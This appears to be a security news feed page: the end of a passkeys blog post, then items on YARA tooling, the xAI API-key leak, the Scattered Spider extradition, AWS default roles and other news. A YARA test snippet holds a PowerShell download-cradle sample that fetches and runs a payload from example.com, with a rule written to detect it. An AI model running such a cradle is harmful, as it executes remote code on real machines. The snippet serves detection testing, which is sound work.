This is a good point to reflect on the paradox that securing your digital life presents: as we seek stronger forms of authentication, we create different risks. Losing all your forms of non-phishable 2FA, for example, creates the risk of losing access to your account. But we also have mitigating controls: your digital passkey is managed totally independently of your physical one so the chances of losing both are extremely low. Plus, best practice is usually to have two U2F keys and enrol them both (I always take one with me when I travel, and leave another one at home). New levels of security, new risks, new mitigations.

Finding Sites That Support Passkeys

All that's great, but beyond my examples above, who actually supports passkeys?! A rapidly expanding number of services, many of which 1Password has documented in their excellent passkeys.directory website:

Have a look through the list there, and you'll see many very familiar brands. You won't see Ubiquiti as of the time of writing, but I've gone through the "Suggest new listing" process to have them added and will be chatting further with the 1Password folks to see how we can more rapidly populate that list.

Do also take a look at the "Vote for passkeys support" tab and if you see a brand that really should be there, make your voice heard. Hey, here's a good one to start voting for:

Summary

I've deliberately just focused on the mechanics of passkeys in this blog post, but let me take just a moment to highlight important separate but related concepts. Think of passkeys as one part of what we call "defence in depth", that is the application of multiple controls to help keep you safe online. For example, you should still treat emails containing links with a healthy suspicion and whenever in doubt, not click anything and independently navigate to the website in question via your browser. You should still have strong, unique passwords and use a password manager to store them. And you should probably also make sure you're fully awake and not jet lagged in bed before manually entering your credentials into a website your password manager didn't autofill for you 🙂

We're not at the very beginning of passkeys, and we're also not yet quite at the tipping point either... but it's within sight. Just last week, Microsoft announced that new accounts will be passwordless by default, with a preference to using passkeys. Whilst passkeys are by no means perfect, look at what they're replacing! Start using them now on your most essential services and push those that don't support them to genuinely take the security of their customers seriously.

☐ ☆ ✇ /r/netsec - Information Security News & Discussion

YARA Playground - Client Side WASM

By: /u/Diligent_Desk5592 — May 4th 2025 at 15:10

Hi all,

I often find myself needing to sanity-check a YARA rule against a test string or small binary, but spinning up the CLI or Docker feels heavy. So I built **YARA Playground** – a single-page web app that compiles `libyara` to WebAssembly and runs entirely client-side (no samples leave your browser).

• WASM YARA-X engine

• Shows pretty JSON, and tabular matches

• Supports 10 MiB binary upload, auto-persists last rule/sample

https://www.yaraplayground.com

Tech stack: Vite, TypeScript, CodeMirror, libyara-wasm (≈230 kB).
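For readers who want an offline sanity check alongside the playground, here is a minimal sketch using the yara-python bindings; this is an assumption about tooling on the reader's side, not how the site works (the playground itself runs a WASM build of the YARA engine entirely in the browser). The rule and sample below are toy examples.

```python
# Minimal local equivalent of "paste a rule, paste a sample, see the matches",
# using the yara-python bindings.
import yara

RULE = r"""
rule SuspiciousPowerShellDownload
{
    meta:
        description = "Toy rule: PowerShell download-cradle strings"
    strings:
        $a = "powershell" nocase
        $b = "DownloadString" nocase
        $c = /https?:\/\/[^\s"']{10,}/
    condition:
        $a and ($b or $c)
}
"""

rules = yara.compile(source=RULE)

sample = b'cmd /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.com/payload.ps1\')"'

for match in rules.match(data=sample):
    print("matched rule:", match.rule)
```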

Would love feedback, feature requests or bug reports (especially edge-case rules).

I hope it's useful to someone, thanks!

☐ ☆ ✇ /r/netsec - Information Security News & Discussion

The Malware That Outsmarted Antivirus, Firewalls, and Humans — Meet Chimera

By: /u/badminton987 — May 4th 2025 at 00:09

This is an article about a fictitious business affected by malware that avoided detection by firewall and antivirus tools.

☐ ☆ ✇ WIRED

Hacking Spree Hits UK Retail Giants

Plus: France blames Russia for a series of cyberattacks, the US is taking steps to crack down on a gray market allegedly used by scammers, and Microsoft pushes the password one step closer to death.
☐ ☆ ✇ Security – Cisco Blog

Black Hat Asia 2025 NOC: Innovation in SOC

By: Jessica (Bair) Oppenheimer — April 24th 2025 at 12:00
Cisco is the Security Cloud Provider to the Black Hat conferences. Learn about the latest innovations for the SOC of the Future.
☐ ☆ ✇ WIRED

Mike Waltz Has Somehow Gotten Even Worse at Using Signal

By: Lily Hay Newman — May 2nd 2025 at 19:46
A photo taken this week showed Mike Waltz using an app that looks like—but is not—Signal to communicate with top officials. "I don't even know where to start with this," says one expert.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

AI hiveminds can exploit vulnerabilities 25% faster—here’s how they work

By: /u/raptorhunter22 — May 2nd 2025 at 09:08

I’ve been researching AI-driven cyber threats and wanted to share some findings on AI hiveminds—collaborative autonomous agents that could redefine offensive security. I wrote a post on this, but here’s the technical gist:

  • AI hiveminds are multi-agent systems where each agent handles a specific task (recon, exploitation, persistence) and coordinates via inter-agent communication. Think swarm intelligence applied to cyber attacks.
  • These agents use reinforcement learning (RL) to adapt in real-time. For example, an RL-trained agent can test exploits, learn from failures, and share insights with the hivemind, boosting efficiency. Research shows they can exploit vulnerabilities 25% faster than traditional methods, especially with minimal input (e.g., brief vuln descriptions).
  • Xanthorox AI, spotted on the darknet in 2025, automates malware generation and vuln exploitation. It’s a glimpse of what’s coming—fully autonomous hiveminds could orchestrate complex attack chains without human oversight.
  • They evade signature-based detection with polymorphic code and adversarial AI, while their speed (e.g., ransomware in hours) outpaces manual response. Defensive multi-agent systems are a potential counter, but observation spaces and reward functions are tricky to define.

You can read the full breakdown, including more on RL frameworks and future implications in the linked post.

What’s your take on this? Are we ready for AI-driven attacks at this scale? How would you approach defending against a hivemind exploiting vulns in real-time?

☐ ☆ ✇ Krebs on Security

xAI Dev Leaks API Key for Private SpaceX, Tesla LLMs

By: BrianKrebs — May 2nd 2025 at 00:52

An employee at Elon Musk’s artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.

Image: Shutterstock, @sdx15.

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, was the first to publicize the leak of credentials for an x.ai application programming interface (API) exposed in the GitHub code repository of a technical staff member at xAI.

Caturegli’s post on LinkedIn caught the attention of researchers at GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.
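As a rough illustration of how that class of scanning works in general, here is a minimal Python sketch that flags known key prefixes and high-entropy strings in a local checkout. It is a toy example, not GitGuardian's actual detection logic; the GitHub and Slack prefixes are publicly documented formats, while the `xai-` prefix is included purely as an assumption about what an x.ai key might look like.

```python
# Toy secret scanner: flag known key prefixes and high-entropy strings in a directory.
import math
import re
import sys
from pathlib import Path

PATTERNS = [
    re.compile(r"ghp_[A-Za-z0-9]{36}"),           # GitHub personal access token (documented format)
    re.compile(r"xox[baprs]-[A-Za-z0-9-]{10,}"),  # Slack tokens (documented format)
    re.compile(r"xai-[A-Za-z0-9]{20,}"),          # assumed x.ai-style key format (illustrative only)
]
CANDIDATE = re.compile(r"[A-Za-z0-9_\-]{20,}")    # generic long token for the entropy check

def shannon_entropy(s: str) -> float:
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs)

def scan_file(path: Path) -> None:
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        return
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pat in PATTERNS:
            for m in pat.finditer(line):
                print(f"{path}:{lineno}: known key pattern: {m.group()[:12]}...")
        for m in CANDIDATE.finditer(line):
            if shannon_entropy(m.group()) > 4.0:  # threshold is arbitrary
                print(f"{path}:{lineno}: high-entropy string: {m.group()[:12]}...")

if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for p in root.rglob("*"):
        if p.is_file() and p.suffix in {".py", ".js", ".ts", ".env", ".json", ".yml", ".yaml", ".txt"}:
            scan_file(p)
```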

GitGuardian’s Eric Fourrier told KrebsOnSecurity the exposed API key had access to several unreleased models of Grok, the AI chatbot developed by xAI. In total, GitGuardian found the key had access to at least 60 fine-tuned and private LLMs.

“The credentials can be used to access the X.ai API with the identity of the user,” GitGuardian wrote in an email explaining their findings to xAI. “The associated account not only has access to public Grok models (grok-2-1212, etc) but also to what appears to be unreleased (grok-2.5V), development (research-grok-2p5v-1018), and private models (tweet-rejector, grok-spacex-2024-11-04).”

Fourrier found GitGuardian had alerted the xAI employee about the exposed API key nearly two months ago — on March 2. But as of April 30, when GitGuardian directly alerted xAI’s security team to the exposure, the key was still valid and usable. xAI told GitGuardian to report the matter through its bug bounty program at HackerOne, but just a few hours later the repository containing the API key was removed from GitHub.

“It looks like some of these internal LLMs were fine-tuned on SpaceX data, and some were fine-tuned with Tesla data,” Fourrier said. “I definitely don’t think a Grok model that’s fine-tuned on SpaceX data is intended to be exposed publicly.”

xAI did not respond to a request for comment. Nor did the 28-year-old xAI technical staff member whose key was exposed.

Carole Winqwist, chief marketing officer at GitGuardian, said giving potentially hostile users free access to private LLMs is a recipe for disaster.

“If you’re an attacker and you have direct access to the model and the back end interface for things like Grok, it’s definitely something you can use for further attacking,” she said. “An attacker could use it for prompt injection, to tweak the (LLM) model to serve their purposes, or try to implant code into the supply chain.”

The inadvertent exposure of internal LLMs for xAI comes as Musk’s so-called Department of Government Efficiency (DOGE) has been feeding sensitive government records into artificial intelligence tools. In February, The Washington Post reported DOGE officials were feeding data from across the Education Department into AI tools to probe the agency’s programs and spending.

The Post said DOGE plans to replicate this process across many departments and agencies, accessing the back-end software at different parts of the government and then using AI technology to extract and sift through information about spending on employees and programs.

“Feeding sensitive data into AI software puts it into the possession of a system’s operator, increasing the chances it will be leaked or swept up in cyberattacks,” Post reporters wrote.

Wired reported in March that DOGE has deployed a proprietary chatbot called GSAi to 1,500 federal workers at the General Services Administration, part of an effort to automate tasks previously done by humans as DOGE continues its purge of the federal workforce.

A Reuters report last month said Trump administration officials told some U.S. government employees that DOGE is using AI to surveil at least one federal agency’s communications for hostility to President Trump and his agenda. Reuters wrote that the DOGE team has heavily deployed Musk’s Grok AI chatbot as part of their work slashing the federal government, although Reuters said it could not establish exactly how Grok was being used.

Caturegli said while there is no indication that federal government or user data could be accessed through the exposed x.ai API key, these private models are likely trained on proprietary data and may unintentionally expose details related to internal development efforts at xAI, Twitter, or SpaceX.

“The fact that this key was publicly exposed for two months and granted access to internal models is concerning,” Caturegli said. “This kind of long-lived credential exposure highlights weak key management and insufficient internal monitoring, raising questions about safeguards around developer access and broader operational security.”

☐ ☆ ✇ WIRED

Think Twice Before Creating That ChatGPT Action Figure

By: Kate O'Flaherty — May 1st 2025 at 13:56
People are using ChatGPT’s new image generator to take part in viral social media trends. But using it also puts your privacy at risk—unless you take a few simple steps to protect yourself.
☐ ☆ ✇ Krebs on Security

Alleged ‘Scattered Spider’ Member Extradited to U.S.

By: BrianKrebs — April 30th 2025 at 21:54

A 23-year-old Scottish man thought to be a member of the prolific Scattered Spider cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege Tyler Robert Buchanan and co-conspirators hacked into dozens of companies in the United States and abroad, and that he personally controlled more than $26 million stolen from victims.

Scattered Spider is a loosely affiliated criminal hacking group whose members have broken into and stolen data from some of the world’s largest technology companies. Buchanan was arrested in Spain last year on a warrant from the FBI, which wanted him in connection with a series of SMS-based phishing attacks in the summer of 2022 that led to intrusions at Twilio, LastPass, DoorDash, Mailchimp, and many other tech firms.

Tyler Buchanan, being escorted by Spanish police at the airport in Palma de Mallorca in June 2024.

As first reported by KrebsOnSecurity, Buchanan (a.k.a. “tylerb”) fled the United Kingdom in February 2023, after a rival cybercrime gang hired thugs to invade his home, assault his mother, and threaten to burn him with a blowtorch unless he gave up the keys to his cryptocurrency wallet. Buchanan was arrested in June 2024 at the airport in Palma de Mallorca while trying to board a flight to Italy. His extradition to the United States was first reported last week by Bloomberg.

Members of Scattered Spider have been tied to the 2023 ransomware attacks against MGM and Caesars casinos in Las Vegas, but it remains unclear whether Buchanan was implicated in that incident. The Justice Department’s complaint against Buchanan makes no mention of the 2023 ransomware attack.

Rather, the investigation into Buchanan appears to center on the SMS phishing campaigns from 2022, and on SIM-swapping attacks that siphoned funds from individual cryptocurrency investors. In a SIM-swapping attack, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls to the victim’s device — including one-time passcodes for authentication and password reset links sent via SMS.

In August 2022, KrebsOnSecurity reviewed data harvested in a months-long cybercrime campaign by Scattered Spider involving countless SMS-based phishing attacks against employees at major corporations. The security firm Group-IB called them by a different name — 0ktapus, because the group typically spoofed the identity provider Okta in their phishing messages to employees at targeted firms.

A Scattered Spider/0Ktapus SMS phishing lure sent to Twilio employees in 2022.

The complaint against Buchanan (PDF) says the FBI tied him to the 2022 SMS phishing attacks after discovering the same username and email address was used to register numerous Okta-themed phishing domains seen in the campaign. The domain registrar NameCheap found that less than a month before the phishing spree, the account that registered those domains logged in from an Internet address in the U.K. FBI investigators said the Scottish police told them the address was leased to Buchanan from January 26, 2022 to November 7, 2022.

Authorities seized at least 20 digital devices when they raided Buchanan’s residence, and on one of those devices they found usernames and passwords for employees of three different companies targeted in the phishing campaign.

“The FBI’s investigation to date has gathered evidence showing that Buchanan and his co-conspirators targeted at least 45 companies in the United States and abroad, including Canada, India, and the United Kingdom,” the FBI complaint reads. “One of Buchanan’s devices contained a screenshot of Telegram messages between an account known to be used by Buchanan and other unidentified co-conspirators discussing dividing up the proceeds of SIM swapping.”

U.S. prosecutors allege that records obtained from Discord showed the same U.K. Internet address was used to operate a Discord account that specified a cryptocurrency wallet when asking another user to send funds. The complaint says the publicly available transaction history for that payment address shows approximately 391 bitcoin was transferred in and out of this address between October 2022 and February 2023; 391 bitcoin is presently worth more than $26 million.

In November 2024, federal prosecutors in Los Angeles unsealed criminal charges against Buchanan and four other alleged Scattered Spider members, including Ahmed Elbadawy, 23, of College Station, Texas; Joel Evans, 25, of Jacksonville, North Carolina; Evans Osiebo, 20, of Dallas; and Noah Urban, 20, of Palm Coast, Florida. KrebsOnSecurity reported last year that another suspected Scattered Spider member — a 17-year-old from the United Kingdom — was arrested as part of a joint investigation with the FBI into the MGM hack.

Mr. Buchanan’s court-appointed attorney did not respond to a request for comment. The accused faces charges of wire fraud conspiracy, conspiracy to obtain information by computer for private financial gain, and aggravated identity theft. Convictions on the latter charge carry a minimum sentence of two years in prison.

Documents from the U.S. District Court for the Central District of California indicate Buchanan is being held without bail pending trial. A preliminary hearing in the case is slated for May 6.

☐ ☆ ✇ WIRED

North Korea Stole Your Job

By: Bobbie Johnson — May 1st 2025 at 07:00
For years, North Korea has been secretly placing young IT workers inside Western companies. With AI, their schemes are now more devious—and effective—than ever.
☐ ☆ ✇ WIRED

AI Code Hallucinations Increase the Risk of ‘Package Confusion’ Attacks

By: Dan Goodin, Ars Technica — April 30th 2025 at 19:08
A new study found that code generated by AI is more likely to contain made-up information that can be used to trick software into interacting with malicious code.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

AiTM for WHFB persistence

By: /u/rikvduijn — April 30th 2025 at 17:09

We recently ran an internal EntraIDiots CTF where players had to phish a user, register a device, grab a PRT, and use that to enroll Windows Hello for Business—because the only way to access the flag site was via phishing-resistant MFA.

The catch? To make WHFB registration work, the victim must have performed MFA in the last 10 minutes. In our CTF, we solved this by forcing MFA during device code flow authentication. But that’s not something you can do in a real-life red team scenario.

So we asked ourselves: how can we force a user we do not control to always perform MFA? That’s exactly what this blog explores.

☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Samsung MagicINFO Unauthenticated RCE

By: /u/Straight-Zombie-646 — April 30th 2025 at 09:23

MagicINFO exposes an endpoint with several flaws that, when combined, allow an unauthenticated attacker to upload a JSP file and execute arbitrary server-side code.

☐ ☆ ✇ WIRED

WhatsApp Is Walking a Tightrope Between AI Features and Privacy

By: Lily Hay Newman — April 29th 2025 at 17:15
WhatsApp's AI tools will use a new “Private Processing” system designed to allow cloud access without letting Meta or anyone else see end-to-end encrypted chats. But experts still see risks.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Shadow Roles: AWS Defaults Can Open the Door to Service Takeover

By: /u/Pale_Fly_2673 — April 29th 2025 at 16:27

TL;DR: We discovered that AWS services like SageMaker, Glue, and EMR generate default IAM roles with overly broad permissions—including full access to all S3 buckets. These default roles can be exploited to escalate privileges, pivot between services, and even take over entire AWS accounts. For example, importing a malicious Hugging Face model into SageMaker can trigger code execution that compromises other AWS services. Similarly, a user with access only to the Glue service could escalate privileges and gain full administrative control. AWS has made fixes and notified users, but many environments remain exposed because these roles still exist—and many open-source projects continue to create similarly risky default roles.
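As a hedged sketch of how one might check their own account for this pattern, the boto3 snippet below lists IAM roles and flags any with the AWS-managed AmazonS3FullAccess policy attached (one of the overly broad grants the write-up describes). The service name hints are illustrative assumptions, not a complete inventory of the affected default roles, and the check ignores inline and resource policies.

```python
# Sketch: flag IAM roles carrying the AWS-managed AmazonS3FullAccess policy.
import boto3

SUSPECT_NAME_HINTS = ("SageMaker", "Glue", "EMR")  # illustrative, not exhaustive

iam = boto3.client("iam")

def roles_with_s3_full_access():
    paginator = iam.get_paginator("list_roles")
    for page in paginator.paginate():
        for role in page["Roles"]:
            name = role["RoleName"]
            attached = iam.list_attached_role_policies(RoleName=name)["AttachedPolicies"]
            for pol in attached:
                if pol["PolicyName"] == "AmazonS3FullAccess":
                    default_like = any(hint in name for hint in SUSPECT_NAME_HINTS)
                    yield name, default_like

if __name__ == "__main__":
    for name, default_like in roles_with_s3_full_access():
        tag = " (service default-style name)" if default_like else ""
        print(f"{name}: AmazonS3FullAccess attached{tag}")
```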

☐ ☆ ✇ WIRED

Millions of Apple Airplay-Enabled Devices Can Be Hacked via Wi-Fi

By: Lily Hay Newman, Andy Greenberg — April 29th 2025 at 12:30
Researchers reveal a collection of bugs known as AirBorne that would allow any hacker on the same Wi-Fi network as a third-party AirPlay-enabled device to surreptitiously run their own code on it.
☐ ☆ ✇ Security – Cisco Blog

Instant Attack Verification: Verification to Trust Automated Response

By: Briana Farro — April 29th 2025 at 12:00
Discover how Cisco XDR’s Instant Attack Verification brings real-time threat validation for faster, smarter SOC response.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Using an LLM with MCP for Threat Hunting

By: /u/eitot8 — April 29th 2025 at 02:21

As a small MCP research project, I’ve built an MCP server to interact with Elasticsearch where Sysmon logs are shipped. This allows an LLM to perform log analysis to identify potential threats and malicious activities 🤖
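The MCP server itself isn't shown in the post, but as a sketch of the kind of query it might run on an LLM's behalf, here is an Elasticsearch search for recent Sysmon process-creation events (Event ID 1) where PowerShell was launched with an encoded command. The index pattern and field names are assumptions that depend on how the logs are shipped; these follow Winlogbeat-style ECS field names, and the client usage assumes elasticsearch-py 8.x.

```python
# Sketch: query shipped Sysmon logs for suspicious PowerShell process creation.
from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")  # assumption: local cluster, no auth

query = {
    "bool": {
        "filter": [
            {"term": {"event.code": "1"}},                        # Sysmon: process creation
            {"range": {"@timestamp": {"gte": "now-24h"}}},
        ],
        "must": [
            {"match": {"process.name": "powershell.exe"}},
            {"match_phrase": {"process.command_line": "-enc"}},   # encoded command flag
        ],
    }
}

resp = es.search(index="winlogbeat-*", query=query, size=20,
                 sort=[{"@timestamp": "desc"}])

for hit in resp["hits"]["hits"]:
    src = hit["_source"]
    print(src.get("@timestamp"),
          src.get("process", {}).get("parent", {}).get("name"),
          "->", src.get("process", {}).get("command_line"))
```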

☐ ☆ ✇ Security – Cisco Blog

Foundation-sec-8b: Cisco Foundation AI’s First Open-Source Security Model

By: Yaron Singer — April 28th 2025 at 11:55
Foundation AI's first release — Llama-3.1-FoundationAI-SecurityLLM-base-8B — is designed to improve response time, expand capacity, and proactively reduce risk.